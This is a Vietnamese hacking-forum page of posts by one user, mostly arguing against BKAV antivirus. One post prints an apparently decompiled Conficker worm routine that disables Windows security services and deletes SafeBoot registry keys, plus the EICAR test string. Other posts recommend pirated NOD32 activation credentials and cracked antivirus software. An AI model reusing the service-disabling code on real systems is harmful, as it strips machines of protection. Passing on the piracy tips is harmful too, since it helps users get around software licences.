banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: Nowhereman  XML
Profile for Nowhereman Messages posted by Nowhereman [ number of posts not being displayed on this page: 9 ]
 
khỏi fai? test đi các bác . sắp tới thằng Microsoft nó ra loại sản phẩm về secure và antivirus. nghe đâu là miễn phí đó . đừng có ai bảo với tớ là sản phẩm của Microsoft thua Bọ cạp ( bkav) nhà ta nhé ! he he he . lại có tin FSOFT của fpt hay zi\ đó cũng sắp ra "đồ" về Antivirus đóa ...nhìu lắm. khi mà càng ngày IT đóng góp lớn vào đời sống của VN mình thì vấn đề bảo mật ...thật sự là miếng BÁNH MẬT cho các đại gia trong làng IT mà. các bác thử nghĩ coi, ví dụ BKIS bán được các gói bảo mật ( security solutions ) của mình từ a-z cho một vài ngân hàng hay các tổ chức lớn khác như bảo hiểm, sân bay, bộ kuốc fong\ .v.v. <<= thì well tìn chắc cũng đủ mua cho mấy anh làm bảo mật mỗi anh một con Rollrocye Phantom cưỡi đó. he he . ( tất nhiên họ sẽ nói là sản phẩm của họ tốt và rẻ hơn các solution của nước ngoài ) abc...v.v. đó là vấn đề của họ . tớ chỉ thấy sao mấy pác Admins HVA nhà ta tài năng mà cứ lặn ngụp lước ngoài làm ze\ ?? trong khi đó các pác ấy rất giỏi SAO KHÔNG LÀM dịch vụ cho các tổ chức trong nước ??? chứ cứ để BKISS một mình một chiến hào ...nghe chừng các bác ấy vác tiền và tiêu tiền mệt lắm ... ( vì nhiều quá mà ) he he

tớ cứ vào đây http://www.nod321.com <<< down và sài thằng Nod32 free và ngon dữ . chẳng quái ze\ mà fai? sài đồ bọ cạp .

một vài í ciến.


he he giờ này vẫn có người fai? trả tiền cho mấy món diệt virut' và đặc biệt lại CÒN trả tiền cho phần mềm diệt vi rút của BKAV ? thật bùn nghê .

tớ thường vào đây lấy username và pass để active phần mềm diệt virut' NOD32 rất tiện và hay .


http://www.nod321.com <<

thấy mọi người thảo luận vui quá nên, tớ cũng xin được tham gia vài ý như sau :

a) những người nào mới làm quen và thấy thích về IT thì nên ( theo mình nhé ) tìm lấy một đề cương những môn học của khoa công nghệ thông tin (IT), của một trường đại học nào đó có tiếng tốt một tí như ĐHBK HA NỘI , ĐHBK Sài Gòn .v.v. chẳng hạn <<< đại loại nó sẽ đưa ra các list những môn học cho từng năm từ cơ sở cơ bản đến ..nâng cao .

rồi ra ngoài hiệu sách mua về mà tự học theo cái Agenda đóa . đỡ mất tìn, tự tìm hiểu ngâm kứu và hỏi han anh google là ngon . lý do mình nên theo cái agenda đó là vì thông thường họ cũng sắp xếp cho mình biết một cách cơ bản và basic dần lên cao . . . mà .

b) theo mình không nên học "Chạy" ma ra tông ngay trong khi chẳng biết là chạy đi đâu ??? hoạc chạy được một lúc rồi đứng lại hỏi " tôi đang làm gì vậy nhỉ " ??? <<< kiểu tẩu hỏa nhập ma, kái gì cũng biết rồi chẳng biết được cái gì ra cái nào he he he . kiểu này trên giang hồ gọi nà kiểu " Chuồn chuồn đớp nước " đớp mỗi nơi một tí rồi chẳng đớp được cái gì . trong khi đó bọn làm tiền nó vẫn thu lên đến hàng nghìn usd cho mấy khóa học vô bổ .oài

c) nếu bạn thực sự thích và quan tâm đến IT , bạn hãy bắt đầu học đi và đừng quên chỉ cần một cái danh sách các môn học NÊN bắt đầu với IT thế nào cho CƠ BẢN << bạn sẽ làm được nhiều điều hơn nhiều loài chuồn chuồn đớp nước .

good luck .

P/s : " chiếc áo không làm nên thầy tu "




hay quá cho em tham gia dự thi với. em không có bằng cấp ( cái này hay ho đây ). quan trọng nhất hình như là được làm việc cạnh anh mrro, hay anh Thái thì fải. được học hỏi rùi . apply thôi .

1 - học tất cả về MÁY VI TÍNH smilie
2 - học thật giỏi tiếng Anh
3 - học thầy Google

good luck

angel_of_devil wrote:
Làm đàn ông thì đàng hoàng một tí đi. Nói xằng nói bậy, võ đoán linh tinh xong giở giọng cù nhầy ko thấy ngượng à? Lại còn Nam Kỳ với Bắc Kỳ nữa. Bó tay smilie 


to angel_of_devi :

ấy lại " Nói xằng nói bậy, võ đoán linh tinh xong giở giọng cù nhầy ..." nữa rồi. ke ke ke smilie smilie.

tớ xin thua rùi mừ .. hì hì angel_of_devil đáng iêu wa' . tớ không nói đến ít chữ hay nhiều chữ ấy nói trước nghe. tớ chỉ nói đến loạn chữ thui ke ke ke

quả thật angle_of_devil nhiều chữ ke ke ke smilie angle_of_devil là người bắc roài ..ke ke .

tớ người Sài Gòn đó. bắc kỳ chỉ lấy thuốc dúm làm thuốc đánh răng là hay ke ke ke smilie

to all :

a) angel _of_devil chính hãng là dân văn chương ke ke ke . => tớ xin THUA ke ke smilie

b) hoàn toàn không nên sài BKAV .

một vài í ciến.


to : angel_of_devil

đề nghị ấy xem 2 đoạn mã code sau đây: nếu ấy hiểu thì tớ nói chuyện tiếp, còn không hiểu gì thì chúng ta không nên tranh lận nhiều nữa vì hai lý do sau đây:

A) tớ đang tranh luận với một người học về chuyên ngành xã hội ( như lịch sử , văn hóa, văn học, địa lý, ngoại ngữ ...) ke ke ke

B) rất mất thời gian và không gian của các member khác.

==============Code ==================================

đoạn code 1 => X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR


đoạn code 2 :


BOOL disable_security_services_and_terminate_conficker_cleaners()
{
HANDLE v;
void *ThreadId;

ThreadId = this;
disable_security_service("wscsvc");
disable_security_service("WinDefend");
disable_security_service("wuauserv");
disable_security_service("BITS");
disable_security_service("ERSvc");
disable_security_service("WerSvc");
SHDeleteValueA(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion
\\Run", "Windows Defender");
callSHDeleteKeyW(
HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\explorer\\ShellServiceObjects\\
{FD6905CE-952F-41F1-9A6F-135D9C6622CC}");
callSHDeleteKeyW(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\SafeBoot");
v = CreateThread(0, 0, monitor_and_terminate_conficker_cleaners, 0, 0, (DWORD *)
&ThreadId);
return CloseHandle(v);
}

int disable_security_service(LPCSTR lpServiceName)
{
void *hSCObject;
char ServiceStatus;
int v;

result = 0;
hSCObject = OpenSCManagerA(0, 0, SC_MANAGER_ALL_ACCESS);
// open service manager with all access granted
if ( hSCObject )
{
v = OpenServiceA(hSCObject, lpServiceName, 0x20027u);
// open the specified service
if ( v )
{
if ( QueryServiceStatus(v, (struct _SERVICE_STATUS *)&ServiceStatus) )
// query the service status
{
if ( ServiceType != SERVICE_KERNEL_DRIVER )
// check if the service is not a device driver
{
success = ControlService(v, 1u, (struct _SERVICE_STATUS *)
&ServiceStatus); // notifies the service that it should stop
if ( success )
Sleep(4000); // sleep 4 seconds
}
}
result |= ChangeServiceConfigA(v, 0xFFFFFFFFu, 4u, 0xFFFFFFFFu,
0, 0, 0, 0, 0, 0, 0);
// set the service configuration so that the service is never started
CloseServiceHandle(v);
}
CloseServiceHandle(hSCObject);
}
return result;
}


=== > Lưu ý đây không phải đoạn code của tớ viết, mà đây là một phần công việc của tớ phải tìm hiểu <==========================



to : angel_of_devil


trích " THÔNG THƯỜNG là không bao giờ cha đẻ ra công nghệ cao và các ứng dụng rộng rãi ( Microsoft , IBM, Sun...) lại không HIỂU bằng, và không có những sản phẩm tìm diệt vi rút TỐT hơn BKav.."

đúng câu trên đây tớ viết nhưng ấy đọc mà hình như chẳng hiểu gì thì phải. thế tớ hỏi ấy dựa vào đâu để các tay viết virus viết ra những virus quậy phá ??? những tay viết virus cũng như những người lập trình ra phần mềm diệt virus phải là những người rất hiểu về HỆ THỐNG của OS và các CÔNG NGHỆ và ỨNG DỤNG liên quan như là MẠNG ( NEWORK ) hay gì gì đó . .. ấy hiểu chưa nhỉ ... ấy đọc và nên hiểu rộng ra đừng xét đoán câu chữ . nếu như bản thân ấy thấy nực cười thì chứng tỏ ấy tớ thua ấy . thế thôi . ke ke ke

ấy hiểu ý câu tớ nói " cha đẻ ra công nghệ cao và các ứng dụng " là gì nào ???

không lẽ Bkis việt nam là cha đẻ ra các công nghệ đó ??? ke ke ke ..

họ có thể rất giỏi trong lĩnh vực học hỏi và phát triển lại những công nghệ đó . (ví dụ như mã mở của dòng Nix*) nhưng SỰ THẬT họ không phải cha đẻ ra Windows , Network.v.v.


ấy hiểu rộng ra tí nha . đừng thấy bảo 1 + 1 = 2 là cả đời chỉ biết có vậy nhé . ke ke .

nào chúng ta hãy nói về virus nào .

P/s : à quên còn dẫn chứng à bạn vào đây nhé .

/hvaonline/posts/list/28588.html <<< rồi làm theo như tớ hướng

dẫn . bạn chắc chắn sẽ thấy được tất cả những dẫn chứng rất cụ thể .


chúc vui. còn bạn vẫn cố tình KHÔNG THẤY, hoặc không thấy thật thì . tạm biệt bạn tớ cũng Thua bạn nha . tớ xin thua nha ke ke ke .




angel_of_devil wrote:
@Nowhere: tự đọc lại những bài viết ở trên xem ai là người nói linh tinh, võ đoán. Tôi chả việc đek j phải giận dỗi j ở đây cả. Đúng là bụng ta suy bụng người. Đời lắm thằng dở người thật smilie


to: angel_of_devil



-> lại nói linh tinh và bậy bạ rồi. ấy có vẻ như là tức tối lắm thì phải . bình tĩnh đi nào . tự đọc lại mấy dòng "thông thái" của chính ấy đi rồi hãy cho người khác là dở hơi và thằng này thằng nọ... tớ xin ấy đấy đừng bình loạn linh tinh nữa . chúng ta hãy cùng nói về vấn đề liên quan tới VIRUS cho đúng nội quy nha. ke ke ke.



angel_of_devil wrote:
@Nowhere: Elite member mà phát biểu rất NGỜ U, tôi chả bênh thằng BKAV nhưng tôi nói thật là nó là một trong những công cụ hữu ích để tôi xử lý sự cố máy tính liên quan đến virus. Lý do:
- cài nhanh, nhẹ
- cập nhật virus nội và virus Tàu nhanh hơn các AV ngoại
- gần như ko bị bug khi scan trong safe mode
Thanh niên VN giờ toàn anh tài, chả hiểu làm đc phần mềm diệt virus nào cho nước nhà như cái BKAV chưa mà mở mồm ra là chê bôi, dè bỉu. Thấy người ta hô hay cũng kêu hay, hô dở cũng kêu dở. Thằng cha Quảng quăng bom thì kệ cha lão ý. Khối thằng muốn làm đc như lão ý để có cái mà nói, mà quăng bom cũng có đc đek đâu. 


to : angel_of_devil .

a) bạn NGỜ tớ chuyện gì vậy ?

b) trong hai phần tớ post ở trên có câu nào có chữ " QUẢNG " hay không ? có câu nào đề cập đến " Thằng cha Quảng quăng bom ... " gì gì đó của bạn nói không ??

c) còn ý kiến của bạn về BKAV là " cài nhanh nhẹ, cập nhật virus nội và virus Tau nhanh hơn các AV ngoại " thì xin để cho thiên hạ hiểu, còn tớ vẫn khuyên bạn là bạn nên tìm hiểu thêm về vấn đề virus TÀU virus Nội rồi quăng bom ke ke ke gì gì đó rồi hãy phát biểu . không mọi người sẽ kười chê thì sao nhỉ .

d) không phải tất cả những người hiểu về IT đều cần phải viết được phần mềm diệt virus . cũng giống như vậy không phải tất cả các phần mềm diệt virus đều xuất sắc. ví dụ như BKAV chẳng hạn ke ke ke .

e ) những gì tớ chia sẽ là rút ra từ khinh nghiệm sài các sản phẩm diệt khác nhau , qua thời gian và tớ có ý kiến đó chứ chẳng phải phát biểu linh tinh lang tang như bạn angel_of_devil đâu .

f) thêm tí này nhé X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR copy đoạn code này vào file text rồi save lại với cái tên là linhtinh.com rồi chạy thử xem nó là virus TÀU hay NỘI bạn angel_of_devil nhé . rùi cho tớ biết luôn cái hì hì .

g) thôi dù sao thì dù, cũng xin được cầu chúc bạn bình an nơi tình yêu thương của Chúa. xin bỏ qua cho mình nếu làm bạn giận nha. lần sau đừng phát biểu liều lĩnh nữa.





chúc bình an.

xin chào các bồ . chúc các bồ một ngày mới an lành và bình anh nơi Chúa. sau một thời gian dài thôi thì đủ kiểu ăn mày, ăn xin, ăn cắp, chôm chôm, ăn cướp, móc túi lừa đảo .v.v. nay tui gom lại được một số phần mềm khá cơ bản chia sẽ ra đây mong các bồ lấy về mà sài. vẫn biết rằng các bồ lên google search là có liền . nhưng tui gom lại đỡ cho ai đó phải search thui mà ke ke ke smilie . vì đây là mục thảo luận về Virus nên, tớ bắt đầu = việc giới thiệu về fần mềm diệt virus tớ đang sài và thấy rất hiệu quả. mong muôn chia sẽ với các bồ nào mà chưa có sài hoạc đang muốn sài .

địa chỉ download :

http://www.thanhoc.net/software <<< chọn eTrustAntivirus.zip .


thật ra thì trong thư mục zip , tớ đã copy một số ảnh khi cài đặt và config cho phần mềm rồi, thêm nữa đây chỉ là quá trình cài đặt một phần mềm diệt virút nên không khó khăn zì cả. tuy vậy tớ vẫn xin lựu ý một số điều sau khi sài phần mềm diệt virus eTrust này .

lưu ý :

1 - các bồ phai uninstall tất cả các phần mềm diệt virus khác như ( Norton , AGV , Mâcff....v.v. ) đang chạy trên may' của bồ; rồi reboot (restart ) lại máy tính . sau đó mới cài eTrustAntivirus.

2 - chỉ cài phần Client Engine ( vì đây là phần Client Engine làm nhiệm vụ chính là tìm diệt và Cập nhật các virus Signatures mới = Update ) .

3 - cài đặt xong. bồ fải reboot lại hệ thống lần nữa . sau đó configs fần Local Scaning và RealTime Protection tức là

config cho hai cách tìm diệt theo kiểu bác QUẢNG cáo nhà ta tiết lộ trong BKAV sắp tới 2009 " Công nghệ nhận diện virus thông minh (Heuristic), công nghệ quét thông minh (Smart Scan) và công nghệ tự bảo vệ trước tấn công (Sefl Defense) sẽ được đưa vào sử dụng. Ngoài ra, các tính năng nâng cao cũng được áp dụng như: Quick Scan (quét nhanh) Full scan (quét toàn bộ hệ thống), Deep scan (quét sâu)… Phiên bản này cũng đặc biệt quan tâm đến việc bảo vệ các ổ di động bằng tính năng USB Protection, bảo vệ thông số hệ thống bằng tính năng Registry Protection. " ĐÓ smilie .

4 - sau khi config các kiểu như trên xong bồ vô phần " Download Signatures Now " để cho Engine của bồ được connect và Download trực tiếp với CA server tại địa chỉ . ftpav.ca.com <<< nhé . nhớ chọn option signature là WINNT hoặc XP nhé .

sau khi hoàn thành Update tới tận thời gian cập nhật mới nhất . UP to TIME . các bồ có thể xem phần Version Information thấy ngày tháng năm là mới là DONE rồi . ngon rồi đó. Let's Start killing VIRUSES . giờ thì các bồ tìm và diệt bọn virus đi thôi.



=== > đặc điểm của trình diệt này mà tớ thích là .

a) miễn fí Engine ( không phải mua bản quyền hay crack zì cả )
b) rất mạnh và bảo vệ thông minh vô cùng , USB hay zì zì mà cắm vô có virus là nó tự diệt ngay hoặc block lại
c) cập nhật UPDATE nhanh và ổn định vô cùng .


== >> Giờ thì các bồ nào sợ virus yên tâm rồi nhé. lưu ý thêm đây chỉ là trình giết virus còn SPYware thì đã có trình diệt riêng. trong thư mục SOFTWARE tại địa chỉ www.thanhoc.net/software << còn rất nhiều các trình diệt virus, spyware , keylogger , rồi các trình về Auditing , Defence , Incident responese Tools <<< chúc các bồ vui .

Khẳng định lại lần nữa là không nên sài Bkav.


P/s : site thần học là site của anh bạn mình . mong rằng bồ nào đó không ưa thì cũng đừng có hack . tôi nghiệp lắm. Chúa dạy phải yêu thương . cầu mong bình an của Chúa luôn ở cùng các bồ .





một vài í ciến.









http://www.geekpedia.com/tutorial28_Introducing-Csharp.html <<< mình Search hộ bạn nào đang hỏi về C# nè ...

>>> Ngó qua thấy vấn đề còn lại là bạn chỉ cần đọc và hiểu được tiếng anh là DONE .



chẳng hạn đọc vài dòng giải thích về LẬP TRÌNH THEO KIỂU HƯỚNG ĐỐI TƯỢNG mà anh thanh niên Andrew pociu này giải thích nè ... thanh niên này sinh năm 1986 đấy nhé .


============================
C# - Object oriented programming


Suppose we have a movie. A movie can have a runtime, a director, a certification, a price...
Also, a movie can be of many types, or genres. A comedy, a drama, a documentary.
All three of them are movies, but different type of movies.
In C#, if we had to include our movie in a program, the movie would be a class. A comedy, drama or documentary are objects of that class.
That means a class is composed from objects. We access the objects of that class using:


Movie.Comedy
Movie.Drama
Movie.Documentary


It makes sense, 'Comedy' is usually a type of movie. If you would have a big database of movies, similar to the IMDB one, you would organize it by the genre of the movies.

Moreover, a movie can also be a comedy and a sci-fi.
Let's take the old 'Back to the future' movie as an example. We can add it like this:


Movie.Comedy.Sci-Fi.BackToTheFuture



Further, what can you do with a movie? Play it, of course. We can represent this as: ..v.v.


=============== Hy vọng bạn tìm được cách học và hiểu C# một cách không quá phức tạp. ========good luck =======




một vài í ciến.
sài Bkav có ngày bị theo dõi cũng nên ( vì nhiều lý do mà . ví dụ nhé lý do theo dõi khách hàng và update từ xa ( remote install and update ), ly do qản lý users "HỘ" các ISP và PC15 chẳng hạn xem ku nào nghịch zi\ ke ke ke ) tóm lại tớ vẫn khuyên KHÔNG NÊN SÀI BKAV trong mọi trường hợp. thêm nữa là công nghệ tìm diệt chuyên đi SAU và NHÁI lại theo công nghệ cao thủ của nước ngoài . Tớ ví dụ luôn giống như họ đang hô hào sự lên đời qua bài " Những tiết lộ đầu tiên về Bkav 2009 http://www.bkav.com.vn/tieu_diem/17/02/2009/8/2139/ <<< " trong này có nói đến tìm diệt theo kiểu " Công nghệ nhận diện virus thông minh (Heuristic), công nghệ quét thông minh (Smart Scan) và công nghệ tự bảo vệ trước tấn công (Sefl Defense) sẽ được đưa vào sử dụng. Ngoài ra, các tính năng nâng cao cũng được áp dụng như: Quick Scan (quét nhanh) Full scan (quét toàn bộ hệ thống), Deep scan (quét sâu)… " <<<< ke ke ke

Chúa ơi . các bác biết không tất cả những CÔNG NGHỆ mà BKAV "tiết lộ " SẼ CÓ smilie trong Bkav 2009 thì đã được nhiều hãng và nhiều trình diệt virus tiếng tăm đưa ra ứng dụng từ những năm 2003 và họ ngày càng hoàn thiện sau 6 năm nay rồi thì bác Bkav mới biết nhái nhái lại tí để dọa ma thiên hạ .

ở đây tớ lấy ví dụ về eTrust Antivirus của CA . -->> chỉ với 10 - 15 ngàn đồng việt nam các bác có thể mua ở các tiệm bán đĩa PC /software bản crack mới nhất của gần hết các trình diệt virust tuyệt vời và Spy , warm wares nữa chứ ??? ôh . các bác cứ mua về sài và kiểm chứng những gì tớ nói đi. hoặc lên Google mà search về những công nghệ đó.

Finally . Suy nghĩ cho kỹ trước khi sài BKAV và đồng thời muốn trở thành một Netter smilie . thêm tí nữa là . THÔNG THƯỜNG là không bao giờ cha đẻ ra công nghệ cao và các ứng dụng rộng rãi ( Microsoft , IBM, Sun...) lại không HIỂU bằng, và không có những sản phẩm tìm diệt vi rút TỐT hơn BKav. và đương nhiên Bkis không là ngoại lệ .


một vài í ciến.




@all : tớ khuyên các bác một câu chân thành nhé. đừng bao giờ tin và dùng thằng Bkav . tớ không hiểu tại sao đến jo'\ này các bác vẫn sài trình diệt vi rút kém nhất là BKAV .

>>>> Lên thử Google.com search với từ khóa antivirus program xem có cả núi. toàn thằng có tên tuổi oài .

->> rồi đừng nói là không có nổi một vài bản copy của những trình diệt virus nổi tiếng như Symantech, CA, AVG ,MaCafee, Deepfre..., .v.v. để sài nhé. đằng sau những trương trình đó là cả một đội ngũ cao thủ ngày đêm săn lùng, tìm diệt virus mới, cho các bồ tha hồ yên tâm quậy fa'. TRUST ME .

chúc rui.

Bọ cạp ( Bkav ) . mình cũng đã có vài lần về ý kiến không nên dùng sản phẩm này rùi. còn sản phẩm của họ có phải là "mã độc" hay không thì còn phải xét. vì đơn giản những chương trình này luôn là những chương trình can thiệp sâu xa vào hệ thống. nên nếu làm kiểu made in VN, môdife nhái nhái lại của các c trình anti virus khác của nước ngoài thì người dùng nên cẩn thận thì hơn. kẻo có ngày lại conflict bung beng lên, roài virus thì không diệt được nhưng vẫn báo là " máy khỏe chạy êm đúng hàng kông ti " smilie ke ke ke . tèo .

>>> Tốt nhất là không nên dùng của Bkav ( ý kiến riêng của tớ ) .


that's cool .

cảm ơn anh conmale, rất tuyệt smilie

tổng hợp và chia sẻ kiến thức thực sự của bản thân mình một cách rất hay; quả thật không phải ai cũng làm được như bác seamoun .

thanks bother smilie
 
Go to Page:  First Page Page 2 Page 4 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|